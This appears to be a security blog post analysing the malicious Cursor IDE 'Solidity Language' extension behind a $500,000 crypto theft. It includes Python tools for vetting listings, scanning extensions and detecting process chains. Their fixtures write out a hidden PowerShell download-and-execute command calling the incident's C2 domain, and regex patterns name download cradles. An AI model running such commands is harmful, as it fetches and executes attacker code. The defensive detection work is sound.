What is the real risk behind malicious VSCode extensions like the Cursor IDE incident?

In July 2025, a Russian crypto developer lost about $500,000 after installing a malicious "Solidity Language" extension in the Cursor AI IDE. The fake extension launched a PowerShell script that fetched further payloads and installed remote access tooling, including ScreenConnect, Quasar RAT and the PureLogs stealer, allowing attackers to steal cryptocurrency wallet credentials and other sensitive data. Despite being listed on Open VSX with an inflated install count, it went undetected until a forensic investigation by Kaspersky. Developers are advised to verify extensions before installing them, watch for unusual system behavior, and run endpoint protection to avoid similar attacks.


In July 2025, a serious cybersecurity incident shocked the crypto development community: a fake extension in the Cursor AI IDE led to the theft of $500,000 in cryptocurrency from a Russian developer. This attack shows how supply chain threats targeting software extensions can result in major financial loss, even for experienced users.

This blog explains the full incident, how the attack worked, and what steps developers and organizations can take to avoid similar threats.

What Happened: $500,000 Crypto Theft Through Cursor IDE Extension

Cursor AI IDE, an AI-powered development environment built on Microsoft's Visual Studio Code, installs its extensions from Open VSX, an open-source extension registry run by the Eclipse Foundation. Microsoft's own marketplace is licensed only for Microsoft products, so VS Code forks such as Cursor rely on Open VSX instead.

In this case, attackers published a fake extension named "Solidity Language," posing as a syntax-highlighting tool for Ethereum smart contracts. Instead of highlighting anything, the extension silently installed remote access and infostealer malware, which let the attackers harvest wallet credentials and eventually drain about $500,000 from the developer's crypto wallet.

How the Attack Worked — Step-by-Step Breakdown

Attack stage               | Description
---------------------------|---------------------------------------------------------------------------
Fake extension upload      | A fake "Solidity Language" extension was published on Open VSX.
Malicious JavaScript       | The extension's entry point, extension.js (unpacked under the user's .cursor/extensions directory), launched a PowerShell script.
PowerShell execution       | The PowerShell script contacted the attacker's server at angelic[.]su to download further payloads.
Remote access installation | The script installed ScreenConnect, a legitimate remote-management tool, giving the attackers full remote control of the machine.
Payload deployment         | Additional malicious files were pushed to the machine over the ScreenConnect session.
Malware installed          | Quasar RAT and the PureLogs stealer were run to capture credentials, browser data and wallet information.
Crypto theft               | With the wallet credentials in hand, the attackers transferred about $500,000 out of the developer's wallet.

What Is Cursor AI IDE?

Cursor AI IDE is a development environment built on Visual Studio Code and extended with AI features. It installs extensions from the Open VSX registry, the vendor-neutral alternative to Microsoft's marketplace.

Unfortunately, publishing to Open VSX needs little more than an account, and the registry does not review extension code, so an attacker can upload a fake or malicious extension as easily as a legitimate developer can.

Malware Types Involved in the Attack

  • Quasar RAT (Remote Access Trojan):
    Allows attackers full control over the infected device, including running commands, capturing screenshots, and keylogging.

  • PureLogs Stealer:
    Specialized in stealing browser cookies, saved passwords, and cryptocurrency wallet information.

How Did Hackers Trick Developers?

  • Uploaded fake extensions with believable names like "Solidity Language," mimicking the legitimate Solidity extension developers already knew.

  • Used fake install counts: the first version showed 54,000 installs, and a replacement published under a similar name showed nearly 2 million.

  • Gamed Open VSX's search ranking, which weighs install counts and how recently an extension was updated, so the freshly published fake appeared above the real extension in search results.

  • Published similar fake extensions on Microsoft's Visual Studio Code Marketplace under names such as "solaibot," "among-eth," and "blankebesxstnion."
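All four of those signals can be checked before an install. The following is an added example, not Open VSX's, Cursor's or Kaspersky's code: it scores a listing's metadata on install count versus reviews, download velocity against listing age, namespace verification, and look-alike names. The field names (namespace, name, displayName, verified, downloadCount, reviewCount, timestamp) follow the author's reading of the Open VSX REST API response for /api/{namespace}/{name} and are an assumption; the trusted identifier soltools.solidity is hypothetical, and the listings are constructed to mirror the incident rather than copied from the registry.

```python
"""Pre-install vetting of an Open VSX listing (added example; not Open VSX's,
Cursor's or Kaspersky's code). Field names follow the author's reading of the
Open VSX REST API response for /api/{namespace}/{name} and are an assumption;
TRUSTED and SAMPLE_LISTINGS are constructed for illustration."""
from datetime import datetime, timedelta, timezone

# Swaps that make a namespace or display name look like a trusted one.
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o", "O": "o"})
NOW = datetime(2025, 7, 1, tzinfo=timezone.utc)  # fixed clock so the demo is reproducible
TRUSTED = {"soltools.solidity": "Solidity"}     # hypothetical allowlist entry, not a real publisher


def skeleton(text):
    """Canonical form for look-alike comparison: fold confusables, case and separators."""
    return "".join(ch for ch in text.translate(CONFUSABLES).lower() if ch.isalnum())


def vet_listing(meta, trusted, now):
    """Score one listing; returns {'id', 'decision', 'reasons'}."""
    ident = f"{meta['namespace']}.{meta['name']}"
    if ident in trusted:
        return {"id": ident, "decision": "allow", "reasons": ["on allowlist"]}
    reasons, lookalike = [], False
    if not meta.get("verified", False):
        reasons.append("namespace not verified")
    published = datetime.fromisoformat(meta["timestamp"].replace("Z", "+00:00"))
    age_days = max((now - published).total_seconds() / 86400, 1.0)
    downloads, reviews = meta.get("downloadCount", 0), meta.get("reviewCount", 0)
    if downloads >= 10_000 and reviews == 0:
        reasons.append(f"{downloads} downloads but zero reviews")
    if downloads / age_days > 5_000:  # a faked counter, or a listing reposted under a new name
        reasons.append(f"{downloads} downloads in {age_days:.0f} day(s)")
    for t_id, t_display in trusted.items():
        t_ns = t_id.split(".", 1)[0]
        if meta["namespace"] != t_ns and skeleton(meta["namespace"]) == skeleton(t_ns):
            reasons.append(f"namespace '{meta['namespace']}' is a look-alike of trusted '{t_ns}'")
            lookalike = True
        elif skeleton(meta.get("displayName", "")).startswith(skeleton(t_display)):
            # weak signal on its own: honest "Solidity Foo" add-ons exist, so this only warns
            reasons.append(f"display name borrows trusted '{t_display}' but publisher differs")
    decision = "block" if lookalike or len(reasons) >= 2 else "warn" if reasons else "allow"
    return {"id": ident, "decision": decision, "reasons": reasons}


SAMPLE_LISTINGS = [  # CONSTRUCTED records shaped like API responses
    {"namespace": "so1tools", "name": "solidity-language", "displayName": "Solidity Language",
     "verified": False, "downloadCount": 54_000, "reviewCount": 0,
     "timestamp": (NOW - timedelta(days=3)).isoformat()},          # the pattern on this page
    {"namespace": "soltools", "name": "solidity", "displayName": "Solidity",
     "verified": True, "downloadCount": 1_900_000, "reviewCount": 140,
     "timestamp": (NOW - timedelta(days=900)).isoformat()},        # the allowlisted extension
    {"namespace": "otherdev", "name": "solidity-plus", "displayName": "Solidity Plus",
     "verified": True, "downloadCount": 800, "reviewCount": 5,
     "timestamp": (NOW - timedelta(days=400)).isoformat()},        # name overlap only
    {"namespace": "newdev", "name": "evm-gas-hints", "displayName": "EVM Gas Hints",
     "verified": False, "downloadCount": 310, "reviewCount": 2,
     "timestamp": (NOW - timedelta(days=20)).isoformat()},         # young but unremarkable
]


def vet_all(listings=SAMPLE_LISTINGS, trusted=TRUSTED, now=NOW):
    return [vet_listing(m, trusted, now) for m in listings]


if __name__ == "__main__":
    for r in vet_all():
        print(f"{r['decision']:5} {r['id']}: {'; '.join(r['reasons'])}")
```

The look-alike namespace check is the one that should block outright: an inflated counter or a missing review can have innocent explanations, but a publisher name that collapses to a trusted one after folding confusable characters almost never does. Fetch the real metadata with the registry's API and feed it to vet_listing() in place of the constructed records.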

Real-World Example: How the Russian Crypto Developer Was Targeted

According to Kaspersky’s investigation:

  • The developer had no antivirus installed and believed the system was clean.

  • Forensic analysis of the disk image showed the extension's extension.js fetching and running a PowerShell script, the first link in the chain described above.

  • The machine was fully compromised, and the attackers drained about half a million dollars in cryptocurrency.

Why This Matters for Developers in 2025

The crypto industry relies heavily on open-source tools and third-party extensions. If even experienced developers can fall for such attacks, anyone using open marketplaces like Open VSX or Visual Studio Code Marketplace is at risk.

How to Protect Yourself from Malicious Extensions

Verify Every Extension:

  • Check the publisher namespace and its official links; on Open VSX, prefer namespaces the registry marks as verified, and compare the publisher identifier with the one the project's own documentation links to.

  • Be suspicious of an extension with a very high install count but few or no reviews, or with a publish date too recent to have earned its numbers; the fake here showed 54,000 installs with no track record.

Monitor System Behavior:

  • If an extension does not do what it advertises or starts processes you did not expect, uninstall it and investigate immediately; a missing feature is often the only visible sign.

Use Antivirus and EDR Tools:

  • Ensure devices have real-time protection; the victim in this case had none.

  • Scan downloaded .vsix packages before installing, but do not rely on that alone: the extension itself was only a small downloader, and the later stages arrived through ScreenConnect, a legitimate tool that most scanners treat as benign.

Prefer Official Marketplaces:

  • Install from the link in the project's own documentation rather than from a marketplace search.

  • Be cautious with Open VSX and similar registries, and remember that look-alikes were found on Microsoft's marketplace too; the publisher identifier matters more than which marketplace serves the file.

Check Source Code:

  • If you're a developer, inspect the extension's files before the IDE loads them; they are unpacked under your extensions directory, such as .cursor/extensions.

  • The entry point is named by the main field in package.json, usually extension.js, and an activationEvents value of "*" means it runs at every IDE start. Look for child_process calls that launch powershell.exe or cmd.exe, downloads from unfamiliar hosts, and long encoded or obfuscated strings.
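The "Check Source Code" advice above can be turned into a repeatable check against the chain in the "How the Attack Worked" table. The following is an added example, not Kaspersky's tooling, Cursor's code, or the real extension's code: it resolves each installed extension's entry point from package.json and flags JavaScript that spawns PowerShell with a download cradle or bypass flags, or that references the C2 domain named on this page. The three extensions it writes into a temporary directory are constructed stand-ins, and the URL path under angelic.su is invented.

```python
"""Static triage of installed Cursor / VS Code extensions (added example; not Kaspersky's
tooling, Cursor's code, or the real extension's code). Resolves each extension's entry
point from package.json and flags JavaScript that spawns PowerShell with a download cradle,
uses bypass flags, or references the C2 host named on this page. Fixtures are CONSTRUCTED."""
import json
import os
import re
import tempfile

INDICATORS = {  # indicator name -> regex; verdict() combines them rather than alerting on one
    "spawns-process": re.compile(r"require\(['\"]child_process['\"]\)|\b(?:exec|spawn|execFile)(?:Sync)?\s*\("),
    "invokes-powershell": re.compile(r"powershell(?:\.exe)?|\bpwsh\b", re.I),
    "download-cradle": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Invoke-Expression|\biex\b", re.I),
    "bypass-flags": re.compile(r"-ExecutionPolicy\s+Bypass|-EncodedCommand|-WindowStyle\s+Hidden", re.I),
    "known-bad-host": re.compile(r"angelic\.su", re.I),  # C2 domain from this incident
}


def resolve_entry_point(ext_dir):
    """Return (package.json dict, path of the file the IDE will load)."""
    with open(os.path.join(ext_dir, "package.json"), encoding="utf-8") as fh:
        pkg = json.load(fh)
    entry = os.path.normpath(os.path.join(ext_dir, pkg.get("main", "./extension.js")))
    if not os.path.isfile(entry) and os.path.isfile(entry + ".js"):
        entry += ".js"  # "main": "./out/extension" is resolved by Node like a module path
    return pkg, entry


def js_files(ext_dir):
    for root, dirs, files in os.walk(ext_dir):
        dirs[:] = [d for d in dirs if d != "node_modules"]  # bundled deps deserve a separate review
        yield from (os.path.join(root, f) for f in files if f.endswith(".js"))


def verdict(indicators):
    if "known-bad-host" in indicators:
        return "malicious"
    if "spawns-process" in indicators and indicators & {"invokes-powershell", "download-cradle", "bypass-flags"}:
        return "suspicious"
    return "review" if indicators else "clean"  # "review": e.g. a linter that runs a compiler via child_process


def scan_extension(ext_dir):
    pkg, entry = resolve_entry_point(ext_dir)
    findings = []
    for path in js_files(ext_dir):
        with open(path, encoding="utf-8", errors="replace") as fh:
            src = fh.read()
        hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
        if hits:
            findings.append({"file": os.path.relpath(path, ext_dir).replace(os.sep, "/"), "indicators": hits})
    return {
        "id": f"{pkg.get('publisher', '?')}.{pkg.get('name', '?')}",
        "entry_point": os.path.relpath(entry, ext_dir).replace(os.sep, "/"),
        "activation": pkg.get("activationEvents", []),  # "*" means it runs at every IDE start
        "findings": findings,
        "verdict": verdict({h for f in findings for h in f["indicators"]}),
    }


def scan_directory(root):
    """Scan every extension folder under root, e.g. ~/.cursor/extensions."""
    return [scan_extension(os.path.join(root, d)) for d in sorted(os.listdir(root))
            if os.path.isfile(os.path.join(root, d, "package.json"))]


def _write(root, folder, pkg, src):
    ext_dir = os.path.join(root, folder)
    main_path = os.path.normpath(os.path.join(ext_dir, pkg["main"]))
    os.makedirs(os.path.dirname(main_path), exist_ok=True)
    with open(os.path.join(ext_dir, "package.json"), "w", encoding="utf-8") as fh:
        json.dump(pkg, fh)
    with open(main_path, "w", encoding="utf-8") as fh:
        fh.write(src)


def build_fixtures(root):
    """Write three CONSTRUCTED extensions under root; none is real extension code."""
    _write(root, "acme.solidity-lint-1.0.0",
           {"name": "solidity-lint", "publisher": "acme", "main": "./out/extension.js",
            "activationEvents": ["onLanguage:solidity"]},
           "const vscode = require('vscode');\nexports.activate = ctx => {\n"
           "  ctx.subscriptions.push(vscode.commands.registerCommand('sol.lint', () => {}));\n};\n")
    _write(root, "acme.solc-runner-2.1.0",  # legitimate child_process use -> "review", not "suspicious"
           {"name": "solc-runner", "publisher": "acme", "main": "./extension.js",
            "activationEvents": ["onCommand:solc.compile"]},
           "const { execFile } = require('child_process');\n"
           "exports.activate = () => execFile('solc', ['--version'], () => {});\n")
    _write(root, "attacker.solidity-language-1.0.0",  # same shape as the chain on this page; URL path invented
           {"name": "solidity-language", "publisher": "attacker", "main": "./extension.js",
            "activationEvents": ["*"]},
           "const { exec } = require('child_process');\nexports.activate = () => {\n"
           "  exec('powershell -ExecutionPolicy Bypass -WindowStyle Hidden -c \"iex (iwr https://angelic.su/stage1)\"');\n};\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_fixtures(root)
        for report in scan_directory(root):
            print(report["id"], report["verdict"], report["findings"])
```

Point scan_directory() at your real extensions folder to triage what is already installed. A "review" verdict is not a conviction: legitimate tooling such as a compiler wrapper also uses child_process, which is why the verdict combines indicators instead of alerting on process spawning alone, and why an "activation" of "*" on an extension that does nothing visible deserves a closer look.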

Closing Thoughts

The malicious Cursor AI IDE extension attack is a clear reminder: even trusted tools can become attack vectors through fake add-ons and supply chain manipulation.

Kaspersky’s advice is simple but critical:

  • Always verify what you install.

  • Stay skeptical of inflated download numbers.

  • Monitor your systems and wallets for unusual activity.

Supply chain attacks targeting developers are not going away — and staying vigilant is now part of everyday security hygiene for IT professionals.

FAQs

What happened in the Cursor IDE crypto theft incident?

A fake VSCode-compatible extension named "Solidity Language" in Cursor AI IDE was used to install remote access malware, leading to a $500,000 crypto theft from a Russian developer.

How did attackers hide the malicious extension?

They published it on Open VSX, inflated its install count, and benefited from a search ranking that weighs install counts and recent updates, so the fake appeared above the legitimate Solidity syntax extension.

What malware was involved in the Cursor IDE attack?

Quasar RAT for remote access and PureLogs stealer for stealing credentials and cryptocurrency wallet information.

How many times was the malicious extension downloaded?

The fake “Solidity Language” extension was downloaded over 54,000 times before removal, while a variant called “solidity” reached nearly two million downloads.

What tools did attackers use for remote access?

ScreenConnect remote management tool was installed via PowerShell scripts embedded in the malicious extension.

Why are crypto developers at risk from such attacks?

Crypto developers often use third-party open-source tools, making them vulnerable to fake packages that target sensitive wallet information.

How can developers avoid malicious VSCode extensions?

Verify publisher credentials, avoid unknown or suspicious extensions, check source code when possible, and use endpoint security tools.

Is Open VSX considered secure now?

Open VSX has removed the malicious extensions, but users should remain cautious as such repositories can still host dangerous packages.

What is Cursor AI IDE?

Cursor AI IDE is an AI-powered development environment based on Visual Studio Code that allows installing VSCode-compatible extensions.

How did Kaspersky investigate the incident?

They analyzed an image of the victim’s hard drive, identified extension.js as malicious, and traced its activities, including remote server connections.

Can antivirus software detect such attacks?

Modern antivirus solutions can detect related malware like Quasar RAT and PureLogs if properly configured.

What is a supply chain attack in software?

It’s when attackers insert malicious code or tools into legitimate development resources like extensions, libraries, or packages.

Why were fake download counts used by attackers?

To make the fake extension appear popular and trustworthy, increasing its chances of being installed by unsuspecting developers.

Is Visual Studio Code Marketplace also affected?

Similar fake extensions like "solaibot" and "among-eth" were found on Visual Studio Code Marketplace, not just Open VSX.

What is the difference between legitimate and fake extensions?

Fake extensions contain hidden malicious code and don’t function as advertised, while legitimate ones perform their stated function securely.

How do PowerShell scripts get executed through extensions?

Extension code runs as ordinary Node.js inside the IDE process with the user's privileges, so it can use Node's child_process module to launch powershell.exe; the PowerShell command then downloads and runs malware from remote servers.

How did attackers persist after installation?

By installing ScreenConnect, which provides ongoing remote access and control over the victim’s system.

Can extension marketplaces prevent such attacks?

Marketplaces can improve security with better vetting and monitoring, but users must also remain cautious and vigilant.

What’s the role of Quasar RAT in this attack?

Quasar RAT gave the attackers interactive control of the infected machine: remote command execution, screenshots, keylogging and file access. It was one of the final-stage payloads delivered over the ScreenConnect session rather than the initial downloader.

How does PureLogs stealer work?

It collects sensitive data like browser cookies, saved passwords, and cryptocurrency wallet files.

What precautions should crypto developers take now?

Only use verified extensions, monitor system processes, back up wallets securely, and employ endpoint detection and response (EDR) solutions.

Was this the first attack using Cursor IDE?

No public record suggests it was the first, but the incident is part of a growing trend of attacks on developers through AI-enhanced and VS Code-compatible tools.

How long did the malicious extension stay live?

It was removed on July 2, 2025, but it had been available long enough to amass tens of thousands of downloads.

What is extension.js in Cursor IDE?

A JavaScript file within the malicious extension that executed PowerShell scripts leading to malware installation.

Why didn’t antivirus detect it earlier?

The victim did not have antivirus software installed, and the attackers staged their access through ScreenConnect, a legitimate remote-management tool that blends in with ordinary administration and is not flagged by signature-based scanners.

What is Open VSX?

An open-source, vendor-neutral extension registry run by the Eclipse Foundation that serves VSCode-compatible editors such as Cursor IDE, which cannot use Microsoft's marketplace.

How can teams monitor for similar attacks?

Implement monitoring systems that detect unusual network connections, file changes, and unauthorized software installations.
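The process chain on this page (IDE spawns PowerShell, PowerShell fetches from angelic[.]su and installs ScreenConnect) maps directly onto the "unusual network connections" and "unauthorized software installations" this answer mentions. The following is an added example, not Kaspersky's, Sysmon's or any vendor's detection content: it runs three rules over Sysmon-style JSON events (EventID 1 ProcessCreate and EventID 3 NetworkConnect, using Sysmon's field names) and renders the parent chain for each alert. The events are constructed; the ScreenConnect installer file name and its /silent flag are assumptions used for illustration.

```python
"""Process-chain detection for the stages listed on this page (added example; not
Kaspersky's, Sysmon's or any vendor's detection content). Consumes Sysmon-style JSON
events with Sysmon field names. SAMPLE_EVENTS is CONSTRUCTED; the ScreenConnect file
name and /silent flag in it are assumptions."""
import json
import ntpath
import re

IDE_IMAGES = {"cursor.exe", "code.exe", "code - insiders.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
REMOTE_ACCESS_MARKERS = ("screenconnect",)  # the remote-management tool used in this incident
KNOWN_BAD_HOSTS = ("angelic.su",)           # C2 domain named on this page
CRADLE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Invoke-Expression|\biex\b"
    r"|-EncodedCommand|-ExecutionPolicy\s+Bypass|-WindowStyle\s+Hidden", re.I)


def image_name(path):
    return ntpath.basename(path or "").lower()


def parse_events(text):
    """One JSON object per line, as a SIEM export or Sysmon-to-JSON shipper would emit."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestry(pid, procs, limit=8):
    """Render the parent chain, e.g. 'explorer.exe > Cursor.exe > powershell.exe'.
    Keyed on ProcessId for brevity; a production pipeline should key on ProcessGuid,
    since PIDs are reused."""
    chain, seen = [], set()
    while pid in procs and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(ntpath.basename(procs[pid]["Image"]))
        pid = procs[pid].get("ParentProcessId")
    return " > ".join(reversed(chain))


def detect(events):
    procs = {ev["ProcessId"]: ev for ev in events if ev.get("EventID") == 1}
    alerts = []
    for ev in events:
        pid = ev.get("ProcessId")
        chain = ancestry(pid, procs) or ntpath.basename(ev.get("Image", ""))
        if ev.get("EventID") == 1:
            parent, image = image_name(ev.get("ParentImage")), image_name(ev.get("Image"))
            cmd = ev.get("CommandLine", "")
            if parent in IDE_IMAGES and image in SCRIPT_HOSTS:  # an editor has no business doing this
                alerts.append({"rule": "ide-spawned-script-host",
                               "severity": "high" if CRADLE.search(cmd) else "medium",
                               "pid": pid, "chain": chain, "detail": cmd})
            if parent in SCRIPT_HOSTS and any(m in image for m in REMOTE_ACCESS_MARKERS):
                alerts.append({"rule": "script-host-installs-remote-access", "severity": "high",
                               "pid": pid, "chain": chain, "detail": cmd})
        elif ev.get("EventID") == 3:
            host = (ev.get("DestinationHostname") or "").lower()
            if any(host == bad or host.endswith("." + bad) for bad in KNOWN_BAD_HOSTS):
                alerts.append({"rule": "connection-to-known-c2", "severity": "critical",
                               "pid": pid, "chain": chain, "detail": host})
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CURSOR = r"C:\Users\dev\AppData\Local\Programs\cursor\Cursor.exe"
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [  # CONSTRUCTED event stream
    {"EventID": 1, "ProcessId": 1200, "ParentProcessId": 900, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"EventID": 1, "ProcessId": 4100, "ParentProcessId": 1200, "Image": CURSOR,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": '"Cursor.exe"'},
    # benign: helper process the IDE always starts
    {"EventID": 1, "ProcessId": 4180, "ParentProcessId": 4100, "Image": CURSOR,
     "ParentImage": CURSOR, "CommandLine": '"Cursor.exe" --type=utility'},
    # the extension's child_process call (URL path invented)
    {"EventID": 1, "ProcessId": 5220, "ParentProcessId": 4100, "Image": PS, "ParentImage": CURSOR,
     "CommandLine": 'powershell -ExecutionPolicy Bypass -WindowStyle Hidden -c "iex (iwr https://angelic.su/stage1)"'},
    {"EventID": 3, "ProcessId": 5220, "Image": PS, "DestinationHostname": "angelic.su", "DestinationPort": 443},
    {"EventID": 1, "ProcessId": 6010, "ParentProcessId": 5220, "ParentImage": PS,
     "Image": r"C:\Users\dev\AppData\Local\Temp\ScreenConnect.ClientSetup.exe",
     "CommandLine": "ScreenConnect.ClientSetup.exe /silent"},
    # benign: an admin's interactive shell opened from the desktop
    {"EventID": 1, "ProcessId": 7000, "ParentProcessId": 1200, "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell -NoProfile Get-ChildItem"},
])


def run_demo(text=SAMPLE_EVENTS):
    return detect(parse_events(text))


if __name__ == "__main__":
    for a in run_demo():
        print(a["severity"].upper(), a["rule"], a["chain"], "|", a["detail"])
```

The first rule is the one that would have fired earliest here: an editor spawning a scripting host is rare enough to page on even without a cradle in the command line, and the rendered chain tells the responder which process to look at. The remote-access rule is deliberately narrow to the tool named on this page; extend REMOTE_ACCESS_MARKERS to whatever remote-management software your fleet does not legitimately install from a shell.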

What is ScreenConnect used for in attacks?

While ScreenConnect is a legitimate remote management tool, attackers use it to gain unauthorized access to victims’ systems.

Why are AI-enhanced IDEs like Cursor IDE targeted?

Because they’re newer platforms with less mature security controls and attract developers working with valuable digital assets.

How can organizations secure their development environments?

Use trusted repositories, restrict extension installations, monitor system activity, and educate teams on supply chain risks.

What lessons can be learned from this incident?

Always verify third-party tools, monitor download sources, and prioritize cybersecurity even in development environments.
